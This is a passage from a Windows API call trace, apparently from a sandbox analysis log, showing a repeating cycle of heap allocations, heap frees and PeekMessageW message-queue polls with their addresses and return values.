hHeap=0x12c0000) returned 1 [0135.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0135.791] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0135.791] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0135.791] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0135.791] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0135.792] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0135.792] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0135.792] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0135.792] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0135.793] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0135.793] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0135.793] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0135.793] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0135.794] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0135.794] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0135.794] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0135.795] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0135.795] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0135.795] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0135.796] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.796] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0135.796] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.796] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.796] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.796] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0135.796] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.796] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0135.796] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0135.797] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0135.797] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0135.797] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0135.797] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0135.798] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0135.798] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0135.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0135.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0135.798] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0135.798] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0135.799] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0135.969] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0135.969] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0135.969] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0135.970] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0135.970] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.972] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.972] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.972] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.972] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.972] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.972] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.972] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0135.972] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0135.973] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0135.973] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0135.973] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.974] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.974] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.974] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.974] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.974] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.974] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.974] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.974] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.974] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.974] PeekMessageW (in: 